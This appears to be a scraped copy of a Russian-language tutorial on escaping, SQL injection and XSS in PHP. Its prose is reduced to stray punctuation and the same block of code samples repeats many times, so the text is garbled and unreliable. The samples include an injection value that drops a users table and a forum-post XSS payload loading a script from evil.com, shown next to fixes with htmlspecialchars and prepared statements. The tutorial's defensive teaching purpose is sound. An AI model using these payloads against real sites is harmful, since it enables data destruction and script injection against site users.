<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
